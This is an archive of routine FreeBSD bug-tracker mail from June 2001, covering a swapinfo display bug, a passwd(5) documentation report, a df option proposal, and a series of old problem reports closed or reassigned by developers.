Received: (from root@localhost) by snoopy.fan.fa.disney.com (8.11.4/8.11.3) id f56KxhX00508; Wed, 6 Jun 2001 13:59:43 -0700 (PDT) (envelope-from root) Message-Id: <200106062059.f56KxhX00508@snoopy.fan.fa.disney.com> Date: Wed, 6 Jun 2001 13:59:43 -0700 (PDT) From: Jim.Pirzyk@disney.com Reply-To: Jim.Pirzyk@disney.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27913: swapinfo/pstat -s does not work under -current Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27913 >Category: bin >Synopsis: swapinfo/pstat -s does not work. >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 14:00:09 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Jim Pirzyk >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: FreeBSD snoopy 5.0-CURRENT FreeBSD 5.0-CURRENT #2: Tue Jun 5 10:55:54 PDT 2001 root@snoopy:/auto/roy/dist/pub/FreeBSD/CURRENT/src/sys/compile/UP_WORKSTATION i386 pstat.c 1.57 >Description: swapinfo does display any information. This is true for both i386 and alpha platforms. >How-To-Repeat: snoopy# swapinfo Device 1K-blocks Used Avail Capacity Type snoopy# >Fix: Not yet found. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 2:41 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7274F37B401; Wed, 6 Jun 2001 14:02:40 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L2cm85312; Wed, 6 Jun 2001 14:02:38 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:02:38 -0700 (PDT) From: Message-Id: <200106062102.f56L2cm85312@freefall.freebsd.org> To: sharki@binary.net, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/16423: Installation problem of 3.4-RELEASE using an ISO image Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Installation problem of 3.4-RELEASE using an ISO image State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 14:02:30 PDT 2001 State-Changed-Why: timed out http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16423 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 3:23 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EED5637B406; Wed, 6 Jun 2001 14:03:21 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L3K685442; Wed, 6 Jun 2001 14:03:20 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:03:20 -0700 (PDT) From: Message-Id: <200106062103.f56L3K685442@freefall.freebsd.org> To: ilia@jane.cgu.chel.su, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/16314: FreeBSD-3.4R doesn't work well on AcerAltos 7000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD-3.4R doesn't work well on AcerAltos 7000 State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 14:03:13 PDT 2001 State-Changed-Why: timed out http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16314 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 4:49 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 192E737B401; Wed, 6 Jun 2001 14:04:48 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L4lg85620; Wed, 6 Jun 2001 14:04:47 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:04:47 -0700 (PDT) From: Message-Id: <200106062104.f56L4lg85620@freefall.freebsd.org> To: s.moeding@ndh.net, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15470: Proposed change to comments in /etc/namedb/named.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Proposed change to comments in /etc/namedb/named.conf State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 14:04:27 PDT 2001 State-Changed-Why: This should be addressed to the BIND maintainers if still a problem. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15470 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 6: 0 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 36CA037B408; Wed, 6 Jun 2001 14:05:58 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L5o986888; Wed, 6 Jun 2001 14:05:50 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:05:50 -0700 (PDT) From: Message-Id: <200106062105.f56L5o986888@freefall.freebsd.org> To: mitja@ksop-cscp.si, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: 3.3-RELEASE Kernel freeze State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 14:05:40 PDT 2001 State-Changed-Why: timed out http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15420 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14: 6:29 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5DD5E37B403; Wed, 6 Jun 2001 14:06:28 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56L6RU88501; Wed, 6 Jun 2001 14:06:27 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:06:27 -0700 (PDT) From: Message-Id: <200106062106.f56L6RU88501@freefall.freebsd.org> To: phk@FreeBSD.org, freebsd-bugs@FreeBSD.org, jlemon@FreeBSD.org Subject: Re: kern/15095: TCP's advertised window is not scaled immediately upon discovering use of Window scale option Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: TCP's advertised window is not scaled immediately upon discovering use of Window scale option Responsible-Changed-From-To: freebsd-bugs->jlemon Responsible-Changed-By: phk Responsible-Changed-When: Wed Jun 6 14:06:02 PDT 2001 Responsible-Changed-Why: over to a true TCP geek... http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15095 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14:12:56 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0754B37B403; Wed, 6 Jun 2001 14:12:55 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56LCsH89264; Wed, 6 Jun 2001 14:12:54 -0700 (PDT) (envelope-from phk) Date: Wed, 6 Jun 2001 14:12:54 -0700 (PDT) From: Message-Id: <200106062112.f56LCsH89264@freefall.freebsd.org> To: aryeh@rad-inet.com, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/13892: Kern.flp does not boot on Compaq Presario 5340 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Kern.flp does not boot on Compaq Presario 5340 State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Wed Jun 6 14:12:40 PDT 2001 State-Changed-Why: timed out http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13892 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14:25: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A49D37B403; Wed, 6 Jun 2001 14:25:04 -0700 (PDT) (envelope-from jdp@FreeBSD.org) Received: (from jdp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56LP4m90438; Wed, 6 Jun 2001 14:25:04 -0700 (PDT) (envelope-from jdp) Date: Wed, 6 Jun 2001 14:25:04 -0700 (PDT) From: Message-Id: <200106062125.f56LP4m90438@freefall.freebsd.org> To: andre.albsmeier@mchp.siemens.de, jdp@FreeBSD.org, freebsd-bugs@FreeBSD.org, jdp@FreeBSD.org Subject: Re: bin/27457: yppush fails when updating two or more slaves Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: yppush fails when updating two or more slaves State-Changed-From-To: open->feedback State-Changed-By: jdp State-Changed-When: Wed Jun 6 14:22:49 PDT 2001 State-Changed-Why: I think this should be fixed by revision 1.13 of src/usr.sbin/yppush/yppush_main.c. Once I get confirmation of that and have merged the fix to -stable, I will close this PR. Responsible-Changed-From-To: freebsd-bugs->jdp Responsible-Changed-By: jdp Responsible-Changed-When: Wed Jun 6 14:22:49 PDT 2001 Responsible-Changed-Why: I am working on this problem now. (Duh.) http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27457 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14:27:46 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CACB937B403; Wed, 6 Jun 2001 14:27:44 -0700 (PDT) (envelope-from unfurl@FreeBSD.org) Received: (from unfurl@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56LRdO90692; Wed, 6 Jun 2001 14:27:39 -0700 (PDT) (envelope-from unfurl) Date: Wed, 6 Jun 2001 14:27:39 -0700 (PDT) From: Message-Id: <200106062127.f56LRdO90692@freefall.freebsd.org> To: ilmar@ints.ru, unfurl@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/21717: DOS while opening /dev/audio Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: DOS while opening /dev/audio State-Changed-From-To: open->closed State-Changed-By: unfurl State-Changed-When: Wed Jun 6 14:26:40 PDT 2001 State-Changed-Why: This problem is no longer present. Tested on 4.3-STABLE with midnight comander 4.5.51. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21717 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14:29:42 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3978937B405; Wed, 6 Jun 2001 14:29:41 -0700 (PDT) (envelope-from unfurl@FreeBSD.org) Received: (from unfurl@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56LTdR90874; Wed, 6 Jun 2001 14:29:39 -0700 (PDT) (envelope-from unfurl) Date: Wed, 6 Jun 2001 14:29:39 -0700 (PDT) From: Message-Id: <200106062129.f56LTdR90874@freefall.freebsd.org> To: mkiser@airmail.net, unfurl@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/20994: /etc/fstab or kernel not correctly installed. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /etc/fstab or kernel not correctly installed. State-Changed-From-To: open->closed State-Changed-By: unfurl State-Changed-When: Wed Jun 6 14:29:04 PDT 2001 State-Changed-Why: Trouble has been determined to be non-code specific and the ftp server in question has been replaced. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=20994 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14:33:23 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0248437B401; Wed, 6 Jun 2001 14:33:21 -0700 (PDT) (envelope-from unfurl@FreeBSD.org) Received: (from unfurl@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56LXK791297; Wed, 6 Jun 2001 14:33:20 -0700 (PDT) (envelope-from unfurl) Date: Wed, 6 Jun 2001 14:33:20 -0700 (PDT) From: Message-Id: <200106062133.f56LXK791297@freefall.freebsd.org> To: feisal@uwi.tt, unfurl@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/21269: Install does not see disk on Advansys card Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Install does not see disk on Advansys card State-Changed-From-To: open->closed State-Changed-By: unfurl State-Changed-When: Wed Jun 6 14:31:20 PDT 2001 State-Changed-Why: Just installed 4.3-RELEASE on machine with identical SCSI card. Works fine. Was either problem in code that was fixed or faulty hardware for the original submitter of this PR. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21269 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 14:50: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A16737B405 for ; Wed, 6 Jun 2001 14:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Lo3w92481; Wed, 6 Jun 2001 14:50:03 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 14:50:03 -0700 (PDT) Message-Id: <200106062150.f56Lo3w92481@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Thomas Moestl Subject: Re: bin/27913: swapinfo/pstat -s does not work under -current Reply-To: Thomas Moestl Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27913; it has been noted by GNATS. From: Thomas Moestl To: FreeBSD-gnats-submit@freebsd.org Cc: Subject: Re: bin/27913: swapinfo/pstat -s does not work under -current Date: Wed, 6 Jun 2001 23:49:12 +0200 On Wed, 2001/06/06 at 13:59:43 -0700, Jim.Pirzyk@disney.com wrote: > System: FreeBSD snoopy 5.0-CURRENT FreeBSD 5.0-CURRENT #2: Tue Jun 5 10:55:54 PDT 2001 root@snoopy:/auto/roy/dist/pub/FreeBSD/CURRENT/src/sys/compile/UP_WORKSTATION i386 > > pstat.c 1.57 > > >Description: > swapinfo does display any information. This is true for > both i386 and alpha platforms. > > >How-To-Repeat: > > snoopy# swapinfo > Device 1K-blocks Used Avail Capacity Type > snoopy# The interface for sysctl exports of swap information from the kernel was changed recently. Are you sure that your kernel and userland (specifically, libkvm) are in sync? If so, I'd be very interesting in debugging information, since I am probably guilty of breaking things then (works for me, though ;). - thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 15:20:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 06B4037B405 for ; Wed, 6 Jun 2001 15:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56MK1m02301; Wed, 6 Jun 2001 15:20:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5A9DE37B405 for ; Wed, 6 Jun 2001 15:13:45 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56MDjq98365; Wed, 6 Jun 2001 15:13:45 -0700 (PDT) (envelope-from nobody) Message-Id: <200106062213.f56MDjq98365@freefall.freebsd.org> Date: Wed, 6 Jun 2001 15:13:45 -0700 (PDT) From: wmoran@iowna.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/27915: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27915 >Category: misc >Synopsis: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 15:20:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Bill Moran >Release: 4.3-RELEASE >Organization: Iowna Software >Environment: I have checked this on different machines, 4.2 & 4.3 RELEASE and STABLE, I have also checked on the web site version of the man pages. >Description: man 5 passwd attempts to describe the format of the /etc/passwd file, but incorrectly describes the /etc/master.passwd file while claiming to describe /etc/passwd. It does not claim to describe /etc/master.passwd anywhere. Also, it would seem appropriate that man 5 master.passwd should bring up this man page, but currently does not. >How-To-Repeat: On a standardly installed 4.2 or 4.3 system, read man 5 passwd and compare it to the actual layout of the /etc/passwd and /etc/master.passwd files. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 15:33:58 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B5E6B37B403; Wed, 6 Jun 2001 15:33:55 -0700 (PDT) (envelope-from imp@FreeBSD.org) Received: (from imp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56MXtT10449; Wed, 6 Jun 2001 15:33:55 -0700 (PDT) (envelope-from imp) Date: Wed, 6 Jun 2001 15:33:55 -0700 (PDT) From: Message-Id: <200106062233.f56MXtT10449@freefall.freebsd.org> To: rcc@unired.net.pe, imp@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/18378: AHA 152x Driver Problem in 4.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: AHA 152x Driver Problem in 4.0 State-Changed-From-To: open->closed State-Changed-By: imp State-Changed-When: Wed Jun 6 16:33:34 MDT 2001 State-Changed-Why: I just fixed it in -current. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=18378 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 15:35:54 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 54BE337B401; Wed, 6 Jun 2001 15:35:52 -0700 (PDT) (envelope-from imp@FreeBSD.org) Received: (from imp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56MZq111719; Wed, 6 Jun 2001 15:35:52 -0700 (PDT) (envelope-from imp) Date: Wed, 6 Jun 2001 15:35:52 -0700 (PDT) From: Message-Id: <200106062235.f56MZq111719@freefall.freebsd.org> To: martijn@be3.com, imp@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/19497: Adaptec AHA-1530P PNP scsi card is not recognised by 4.0-stable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Adaptec AHA-1530P PNP scsi card is not recognised by 4.0-stable State-Changed-From-To: open->closed State-Changed-By: imp State-Changed-When: Wed Jun 6 16:35:38 MDT 2001 State-Changed-Why: Commited fix to current. Will MFC after a week. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=19497 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 15:39: 3 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DBB7737B405; Wed, 6 Jun 2001 15:38:59 -0700 (PDT) (envelope-from imp@FreeBSD.org) Received: (from imp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56McxW13565; Wed, 6 Jun 2001 15:38:59 -0700 (PDT) (envelope-from imp) Date: Wed, 6 Jun 2001 15:38:59 -0700 (PDT) From: Message-Id: <200106062238.f56McxW13565@freefall.freebsd.org> To: imp@FreeBSD.org, freebsd-bugs@FreeBSD.org, imp@FreeBSD.org Subject: Re: kern/21461: ISA PnP resource allocator problem Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ISA PnP resource allocator problem Responsible-Changed-From-To: freebsd-bugs->imp Responsible-Changed-By: imp Responsible-Changed-When: Wed Jun 6 16:38:40 MDT 2001 Responsible-Changed-Why: I'll look into this. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21461 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 16:20: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB49537B401 for ; Wed, 6 Jun 2001 16:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56NK3X29475; Wed, 6 Jun 2001 16:20:03 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 16:20:03 -0700 (PDT) Message-Id: <200106062320.f56NK3X29475@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Cyrille Lefevre Subject: Re: bin/19635: add -c for grand total to df(1), like du(1)does Reply-To: Cyrille Lefevre Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/19635; it has been noted by GNATS. From: Cyrille Lefevre To: "Brad Knowles" Cc: "\"Will Andrews\" " , Subject: Re: bin/19635: add -c for grand total to df(1), like du(1)does Date: 07 Jun 2001 01:14:15 +0200 "Brad Knowles" writes: > At 9:21 PM -0400 2000/7/3, Will Andrews wrote: > > > Does anyone else here think this is a good idea? > > If you're looking for votes, you've got mine. > > BTW, will this play nicely with -h? Consider me stupid if you yes since all internal values are counted in bytes as I remember me. juste the output is affected by -h or whatever option. -c just add a summary line. PS : take care, my email address have changed. no more citeweb.net (not reliable) nor poboxe.com (no more free). thanks. Cyrille. -- home: mailto:clefevre@redirect.to UNIX is user-friendly; it's just particular work: mailto:Cyrille.Lefevre@edf.fr about who it chooses to be friends with. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 17:37:53 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F62E37B403; Wed, 6 Jun 2001 17:37:52 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f570bqx37555; Wed, 6 Jun 2001 17:37:52 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 17:37:52 -0700 (PDT) From: Message-Id: <200106070037.f570bqx37555@freefall.freebsd.org> To: jsuter@intrastar.net, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13646: Kernel Trap error when booting 3.3-RC kernel with Softupdates enabled Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Kernel Trap error when booting 3.3-RC kernel with Softupdates enabled State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Wed Jun 6 17:33:38 PDT 2001 State-Changed-Why: Much has changed since 3.3-RC; if you can reproduce this on a more recent release, then please submit more details. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13646 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 17:39:54 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 015CC37B407; Wed, 6 Jun 2001 17:39:51 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f570dnP37767; Wed, 6 Jun 2001 17:39:49 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 17:39:49 -0700 (PDT) From: Message-Id: <200106070039.f570dnP37767@freefall.freebsd.org> To: spe@neo.gen.oleane.fr, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13517: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Wed Jun 6 17:38:17 PDT 2001 State-Changed-Why: Can you reproduce this on more recent versions of FreeBSD? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13517 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 17:44:51 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 666FF37B405; Wed, 6 Jun 2001 17:44:49 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f570in938698; Wed, 6 Jun 2001 17:44:49 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 17:44:49 -0700 (PDT) From: Message-Id: <200106070044.f570in938698@freefall.freebsd.org> To: james-hunsaker@uiowa.edu, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13630: system halts after npx0 detected on 3.2 install Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: system halts after npx0 detected on 3.2 install 